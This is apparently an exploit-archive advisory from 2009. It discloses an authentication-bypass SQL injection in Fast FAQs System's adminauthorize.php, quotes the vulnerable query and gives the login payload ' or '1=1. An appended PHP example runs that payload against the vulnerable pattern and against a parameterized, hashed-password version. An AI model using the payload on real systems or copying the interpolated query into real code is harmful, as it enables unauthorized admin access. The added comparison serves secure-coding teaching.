
# Title : Fast FAQs System (Auth Bypass) SQL Injection Vulnerability
# Published : 2009-01-09
# Author : x0r


########################
# -=Fast FAQs System=- #
########################
Author: x0r
Email: x0r@live.it
CMS site: http://fastcreators.com/products/fast_faq/download.php
#########################

Bug in adminauthorize.php:

$query = "select * from admin where userid='{$_POST['uname']}' AND pass='{$_POST['pass']}'";

Exploit:

' or '1=1

#######################

Greetz: Anna...Strabica...Emetta... I love you all..

-- w00t Zone - w00tzone.org 
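
The query quoted from adminauthorize.php next to a parameterized version, as an added example that is not part of the original advisory or of the Fast FAQs System code. The in-memory SQLite database, the account, the function names, and the use of password_hash() for the pass column are assumptions made for the demonstration.

```php
<?php
// Added example, not Fast FAQs code. Table and column names follow the query
// quoted in the advisory; the SQLite fixture and the account are constructed.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE admin (userid TEXT PRIMARY KEY, pass TEXT)");
// Assumption: pass holds a password_hash() value; the page does not say how
// the application stores passwords.
$db->prepare("INSERT INTO admin (userid, pass) VALUES (?, ?)")
   ->execute(['admin', password_hash('constructed-password', PASSWORD_DEFAULT)]);

// The pattern from adminauthorize.php: request values are interpolated into
// the SQL text, so a quote in either field ends the string literal and the
// rest of the input is parsed as part of the WHERE clause.
function login_vulnerable(PDO $db, string $uname, string $pass): bool
{
    $query = "select * from admin where userid='{$uname}' AND pass='{$pass}'";
    return $db->query($query)->fetch() !== false;
}

// Hardened form: the statement text is fixed and the user name travels as a
// bound parameter, so it is only ever compared as data. The password is
// checked in PHP against the stored hash instead of inside the query.
function login_hardened(PDO $db, string $uname, string $pass): bool
{
    $stmt = $db->prepare("SELECT pass FROM admin WHERE userid = ?");
    $stmt->execute([$uname]);
    $hash = $stmt->fetchColumn();
    return is_string($hash) && password_verify($pass, $hash);
}

$payload = "' or '1=1";   // the string quoted under "Exploit:" in the advisory

// Case 1: advisory string in both fields against the interpolated query.
var_dump(login_vulnerable($db, $payload, $payload));
// Case 2: the same input against the parameterized lookup.
var_dump(login_hardened($db, $payload, $payload));
// Case 3: the constructed account with its own password.
var_dump(login_hardened($db, 'admin', 'constructed-password'));
// Case 4: the constructed account with a wrong password.
var_dump(login_hardened($db, 'admin', 'wrong'));
```

The script needs the pdo_sqlite extension; in the application itself the same prepare/execute calls apply to its own database connection.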
